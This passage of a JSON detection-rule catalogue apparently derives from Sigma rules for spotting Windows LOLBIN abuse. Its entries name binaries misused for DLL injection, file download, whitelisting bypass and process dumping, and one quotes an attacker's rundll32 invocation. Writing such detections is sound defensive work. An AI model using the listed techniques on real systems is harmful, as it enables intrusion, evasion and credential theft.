"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + 
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process" + }, + { + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate use for tracing purposes" + ], + "filename": "proc_creation_win_lolbin_mftrace.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "value": "Use of Mftrace.exe" + }, + { + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Possible undocumented parents of 
\"msdt\" other than \"pcwrun\"" + ], + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File" + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE" + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.execution", + "attack.t1218" + ] + }, + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE" + }, + { + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2022/01/25", + "falsepositive": [ + "Rare false positives could occur on servers with multiple drives." + ], + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" + ], + "tags": [ + "attack.t1218.001" + ] + }, + "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "value": "LOLBIN From Abnormal Drive" + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "meta": { + "author": 
"Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "filename": "proc_creation_win_lolbin_openconsole.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole" + }, + { + "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_pcalua.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "value": "Use of Pcalua For Execution" + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "meta": { + "author": "A. 
Sungurov , oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" + ], + "filename": "proc_creation_win_lolbin_pcwrun.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "value": "Indirect Command Execution By Program Compatibility Wizard" + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina" + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_pktmon.yml", + "level": "medium", 
+ "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_presentationhost_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "value": "Download Arbitrary Files Via PresentationHost.exe" + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_printbrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction" + }, + { + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_pubprn.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "value": "Pubprn.vbs Proxy Execution" + }, + { + "description": "Detects using Rasautou.exe for loading arbitrary 
.DLL specified in -d option and executes the export specified in -p.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe" + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_regasm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ] + }, + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution" + }, + { + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + 
"falsepositive": [ + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + ], + "filename": "proc_creation_win_lolbin_register_app.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "value": "REGISTER_APP.VBS Proxy Execution" + }, + { + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
+ ], + "filename": "proc_creation_win_lolbin_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe" + }, + { + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_replace.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", + "value": "Replace.exe Usage" + }, + { + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "creation_date": "2022/04/28", + "falsepositive": [ + "Legitimate installation of a new screensaver" + ], + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution" + }, + { + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate use when App-v is deployed" + ], + "filename": "proc_creation_win_lolbin_scriptrunner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", + "value": "Use of Scriptrunner.exe" + }, + { + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "meta": { + "author": "Anton Kutepov, oscd.community", + "creation_date": "2020/02/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_settingsynchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" + ] + }, + "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "value": "Using SettingSyncHost.exe as LOLBin" + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as 
a LOLBIN by abusing the \"-D\" flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN" + }, + { + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE" + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sigverif.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution" + }, + { + "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" + ], + "filename": "proc_creation_win_lolbin_squirrel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe" + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole" + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "filename": "proc_creation_win_lolbin_susp_atbroker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution" + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download" + }, + { + "description": "Detects 
when a possible suspicious driver is being installed via pnputil.exe lolbin", + "meta": { + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe" + }, + { + "description": "Detects execution of of Dxcap.exe", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe" + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": "Suspicious GrpConv Execution" + }, + { + "description": "Detect the use of Windows Defender to download payloads", + "meta": { + "author": "Matthew Matchen", + "creation_date": "2020/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", + "value": "Windows Defender Download Activity" + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + 
"creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe" + }, + { + "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", + "meta": { + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Automation and orchestration scripts may use this method execute scripts etc", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + ], + "filename": "proc_creation_win_lolbin_susp_wsl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "value": "WSL 